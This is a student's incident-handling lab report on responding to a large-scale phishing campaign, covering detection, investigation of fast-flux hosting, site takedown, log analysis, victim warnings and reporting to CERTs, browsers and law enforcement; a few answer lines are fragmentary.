Lab 14.

Incident Handling Techniques

Kanan Nabi

Task 1. Resolving large-scale incident

Read and study the case of large-scale attack. For Large scale phishing attack answer
questions and write your thoughts how to take down this and resolve this incident.

LARGE SCALE PHISHING ATTACK

Phishing is a cyber attack that uses disguised email as a weapon. The goal is to trick
the email recipient into believing that the message is something they want or need — a
request from their bank, for instance, or a note from someone in their company — and to
click a link or download an attachment.
What really distinguishes phishing is the form the message takes: the attackers
masquerade as a trusted entity of some kind, often a real or plausibly real person, or a
company the victim might do business with.
The attackers spoof their email address so it looks like it's coming from someone else,
set up fake websites that look like ones the victim trusts, and use foreign character sets to
disguise URLs.
Phishing emails and text messages may look like they’re from a company you know
or trust. They may look like they’re from a bank, a credit card company, a social networking
site, an online payment website or app, or an online store.
Phishing emails and text messages often tell a story to trick you into clicking on a link
or opening an attachment. They may:
● say they’ve noticed some suspicious activity or log-in attempts
● claim there’s a problem with your account or your payment information
● say you must confirm some personal information
● include a fake invoice
● want you to click on a link to make a payment
● say you’re eligible to register for a government refund
● offer a coupon for free stuff.
That said, there are a variety of techniques that fall under the umbrella of phishing.
There are a couple of different ways to break attacks down into categories. One is by the
purpose of the phishing attempt. Generally, a phishing campaign tries to get the victim to do
one of two things:
Hand over sensitive information. These messages aim to trick the user into revealing
important data — often a username and password that the attacker can use to breach a system
or account. The classic version of this scam involves sending out an email tailored to look
like a message from a major bank; by spamming out the message to millions of people, the
attackers ensure that at least some of the recipients will be customers of that bank. The victim
clicks on a link in the message and is taken to a malicious site designed to resemble the
bank's webpage, and then hopefully enters their username and password. The attacker can
now access the victim's account.
Download malware. Like a lot of spam, these types of phishing emails aim to get the
victim to infect their own computer with malware. Often the messages are "soft targeted" —
they might be sent to an HR staffer with an attachment that purports to be a job seeker's
resume, for instance.
Some tell-tale signs of a phishing email include:
● ‘Too good to be true’ offers
 ● Unusual sender
● Poor spelling and grammar
● Threats of account shutdown, etc., particularly conveying a sense of urgency
● Links, especially when the destination URL is different than it appears in the
email content
● Unexpected attachments

Task 2 Source of information

How you could recognize that the phishing attack is happening?

Example: A phishing URL was reported by a bank, whose customers are being targeted. The
CERT has obtained a URL or URLs pointing to phishing site(s).

Answer:

Email and Web Traffic Analysis:

A sudden increase in emails containing suspicious links or attachments may indicate a

phishing campaign. Anomalous web traffic directed to a suspicious domain or multiple IPs.

Phishing Characteristics:

Suspicious sender addresses mimicking legitimate ones.Messages containing poor grammar,

urgent demands, or requests for sensitive information. Links that appear legitimate but point
to different URLs upon inspection.

Malware Detection:

Attachments in phishing emails may trigger antivirus alerts.

Task 3 Initial investigation

Next step is to find out: a) if this is not a false alert, b) where the phishing sites are
located, and c) how the attack is carried out.

The answers may overlap, so all are included in one step. Questions that can help you
find out what is going on:

Are the phishing sites still active or alive? How to check this?
Are they active in all popular browsers or just in a particular one? What about wget?
Maybe the phishing site requires a specific ‘user agent’ field set or another (for example
‘referer’)?
Where are the phishing sites (logically and physically) located? How to find out?
What is the domain and IP address of the www server? To whom does the IP and domain
name belong? Who is the host-master? Who is the ISP?
How is the attack being carried out? What technique is used to serve the phishing
site? How to check this? Is the fast-flux technique used? Does every IP returned from the dns
query lead to a response? Are there other sites on this server (IP)? What about the main page
from the phishing URL?

Example:

The domain name resolves to many and various IPs. There is a strong possibility of
fast-flux. The IPs belong to different ISPs, perhaps in a different country. There is no ‘main
page’ on the ‘server’.
Digression: Why are there so many IPs and why do some of them do not respond?
Why do the miscreants use fast-flux? These IPs are probably zombies from some botnet.
They are probably desktop-computers infected by special malware. Some of them are simply
switched off.)

Answer:

1.Check if the phishing sites are still active:

We should access the URL directly; in that case we can use a secure and isolated
environment (sandbox or virtual machine) to avoid infection. Then verify whether the site
functions across different browsers or requires a specific user agent and then use commands
like wget with various user-agent headers to check accessibility.

2. Verify the logical and physical location:

We can use tools like whois which find the domain's registration details. In the next step We
can use nslookup or dig to resolve the domain to an IP address.
In the last step we should check ownership that We identify the ISP and hostmaster
associated with the IP.

3. Identify attack techniques:

Check whether the domain resolves to multiple IPs, possibly indicating a fast-flux network.
In the next step we should analyse DNS Response Analysis whether all returned IPs provide
a response or are unresponsive (indicating botnet zombies). In the last step we should analyse
Web Server that investigate if the phishing URL has a primary page or if it is just a collection
of fraudulent forms.

Task 4 Take down

The next step is to organize the takedown of this site as soon as possible. It is
recommended that an attempt be made to try to track down the miscreants and victims of the
phishing. Questions for you:

1. How to take down the phishing site? What is the fastest way to communicate with
the administrator of the site? From which source can you get contact information?

Example: You could check the who.is database. The fastest way for contacting is by
telephone. Many times it is better to send details via e-mail and call to inform that there was a
phishing and details were sent via e-mail. Maybe there is an abuse-team or CERT team
operating at the ISP? You must take language and time differences into account. In this case
it is recommended that another CERT team from that country be involved – you could look
one up on the FIRST site, www.first.org.)

2. Is the deletion of the phishing site by the administrator of a compromised site

enough?
Where could you search for information about the break-in to the server and the
vulnerability? If there could be a vulnerability in the www server or in the PHP scripts or in
the database, etc, where can you find information about suspicious requests, form entries,
errors, etc? (Answer: inadequate server logs, etc.)

Server logs: You should mainly look at the following log files:

 Web server logs (Apache: access.log, error.log; Nginx: access.log,

error.log)
 PHP error logs
 Database logs (MySQL, PostgreSQL, etc.)
 Firewall and IDS/IPS logs (Snort, Suricata, etc.)
 Syslog or Event Viewer data (for Linux and Windows)

Where can suspicious requests, form entries, and errors be found?

 Web server logs: To check for unusual HTTP requests.

 Database query logs: To detect SQL injection attempts.
 PHP and script error logs: To find out which part of the site is weak.
 WAF (Web Application Firewall) logs: To detect attack attempts.

Finally, the root causes of the site being hacked should be investigated, loopholes should
be closed, and appropriate security measures should be taken.

3. How to track down the miscreants? Where can you find some information about
them? Where are the drop sites of the miscreants? (Answer: you must analyse the source code
of the phishing site, as there may be information about where stolen data is sent. Other scripts
on the compromised server, as well as server and e-mail logs could be helpful.)
4. Where to find information about victims?
5.What to do with this information?
6. Are these steps enough? What about cases, when we were unable to take the site
down?
7. Should law enforcement become involved?

Answers:
3. a) Firstly, we should analysis of the source of code of the phishing site. The first step is by
examining the site's HTML, JavaScript, and PHP code, it is possible to determine where the
stolen data is being sent and form action="..." some HTML

b) We can also analysis of other scripts on the compromised server by checking other PHP or
CGI scripts installed on the server, it is possible to determine whether the attackers have left a
backdoor and crontheir work and

c) The other way we should check server and email logs. For example, web server logs
(access.log, error.log), phishing database logs – to investigate malicious SQL queries or
unauthorized data extractions and email logs – stolen information

d) The next way is analysing DNS and IP information, reverse DNS Lookup that to find out
what other domains are on the same IP and passive DNS databases

4. a) Phishing Site Logs

Web server logs (`access access.log, error.log) – Phishing

Database logs – A
Email logs – O

b) Phishing Site Source Code Analysis

Form inputs (<form action="...">)

It is possible to examine how victims' data is collected and transmitted within JavaScript and
PHP scripts.

c) Investigating Attacker Drop Sites

DNS records and WHOIS information – In a phishing attack

Reverse DNS Lookup – Another hot spot for attackers
Passive DNS analyses – Previously

d) Warning to Victims

Banks or organizations –
CERT/CSIRT teams – Damage
Reporting to platforms like Google Safe Browsing and PhishTank
5.
a) Notify Relevant Authorities
We should inform the affected organization (e.g., a bank if its customers were targeted) and
then report to cybersecurity teams like CERT (Computer Emergency Response Team).
If the attack is severe, contact law enforcement

b) Take Down the Phishing Site

It is better to contact the hosting provider or domain registrar and then report the phishing
URL to services like Google Safe Browsing, PhishTank, and Microsoft PhishingFilter.

c) Analyse the Attack

Investigate the phishing site’s code to find information about the attackers and data
exfiltration methods. In conclusion check if any vulnerabilities were exploited (e.g., in the
website’s PHP scripts or database).

d) Warn and Mitigate

Notify potential victims via email alerts or website warnings,work with browsers to blacklist
malicious URLs and implement email security measures (SPF, DKIM, DMARC) to prevent
future attacks.

e) Strengthen Defences

Monitor network traffic for signs of ongoing phishing attacks,educate users on identifying
phishing attempts and ensure robust endpoint security and regular software updates.

6.

While the outlined steps are effective in many cases, there are scenarios where a phishing site
cannot be taken down immediately or at all. Here’s what to do in such cases:

a) Increase Awareness and Mitigation

 Warn Potential Victims: Send out alerts to users who may have interacted with the
phishing site.
 Blacklist the URL: Notify browsers (Google Safe Browsing, Microsoft Defender,
etc.) and email providers to block access.
 Work with Financial Institutions: If credentials are stolen, banks and services
should notify users and enforce account security measures.

b) Engage Cybersecurity Communities

 Report to Global Threat Intelligence Platforms: Share indicators of compromise

(IOCs) with cybersecurity teams (e.g., CERT, IT security forums).
c) Use Honeypots: If possible, deploy deception techniques to study attacker behavior and
gather further intelligence.

d) Escalate to Law Enforcement

 Engage Legal Authorities: If the phishing attack is severe, national cybersecurity

agencies or law enforcement (Interpol, FBI’s IC3, Europol) should be involved.
 Trace Financial Transactions: If financial fraud is involved, collaboration with
financial fraud investigators can help track and freeze attacker assets.
Conclusion

If a phishing site cannot be immediately taken down, mitigation strategies, public warnings,
and intelligence sharing are essential to reduce the attack's effectiveness.

7.

Yes, law enforcement should be involved in cases where:

a) The Attack is Large-Scale or Targets Critical Infrastructure

 If the phishing campaign affects a government agency, a financial institution, or a

major corporation.
 If the attack has the potential to cause severe financial or reputational damage.

b) Personally Identifiable Information (PII) or Financial Data is Stolen

 If user credentials, banking details, or sensitive corporate data are compromised, law
enforcement can help track and mitigate damages.

c) The Attack is Part of a Larger Cybercrime Operation

 Some phishing campaigns are linked to organized cybercrime groups or state-

sponsored actors.
 Law enforcement agencies (e.g., FBI, Europol, Interpol) have the resources to
investigate beyond the immediate phishing site.

d) Legal Action is Required Against Attackers

 If the attackers are identified, authorities can initiate criminal investigations and legal
proceedings.
 Tracking financial transactions associated with phishing scams often requires law
enforcement cooperation.

How to Involve Law Enforcement?

 Report the phishing attack to national cybersecurity agencies (CERT, CISA,

NCSC).
 File a complaint with cybercrime units (FBI’s IC3, Europol's EC3, Interpol).
 Provide all collected evidence, including phishing URLs, email headers, and affected
IP addresses.
 Task 5 Warning & Mitigation

It is strongly recommended that potential victims be warned.

Does the bank know about the phishing?

Should you write an alert on your webpage? Who should first know about this: the
bank or the people reading your site?
How to alert people who have visited phishing site(s)? Most popular browsers can
warn people – how do you get them to do this? In which external services can you report
phishing URL(s)? (Answer: phishing sites should be reported to Google Safe Browsing,
Netcraft (https://sitereport.netcraft.com), PhishTank (https://www.phishtank.com), Microsoft
PhishingFilter (https://support.microsoft.com/en-us/office/protect-against-phishing-attempts-
in-microsoft-365-86c425e1-1686-430a-9151-f7176cce4f2c) Where else?

Answers:

The bank should be immediately notified if it is the primary target of the phishing attack.
They can take swift action, such as:

 Informing their customers about the fraudulent website.

 Blocking transactions from compromised accounts.
 Enhancing their fraud detection systems.

Should You Write an Alert on Your Webpage?

Yes, but the priority should be informing the bank first. Once they are aware and have issued
an official response, a general alert can be posted to warn a broader audience.

Who Should Know First: The Bank or the Public?

 First, notify the bank so they can take necessary steps to protect customers.
 Then, alert the public via website warnings, social media, and cybersecurity
awareness platforms.

How to Alert People Who Have Visited the Phishing Site?

 Report the phishing site to major security providers, so browsers warn users
before they access it.
 Use email alerts or SMS notifications (if available) to inform potentially affected
users.
 Provide security tips (e.g., changing passwords, monitoring account activity).

How to Get Browsers to Warn Users?

Most modern browsers (Chrome, Firefox, Edge, Safari) use databases like Google Safe
Browsing to block malicious sites. To report a phishing site:

 Google Safe Browsing: https://safebrowsing.google.com

 Netcraft Anti-Phishing: https://sitereport.netcraft.com
 PhishTank: https://www.phishtank.com
 Microsoft Phishing Filter: https://support.microsoft.com/en-us/office/protect-
against-phishing-attempts-in-microsoft-365-86c425e1-1686-430a-9151-f7176cce4f2c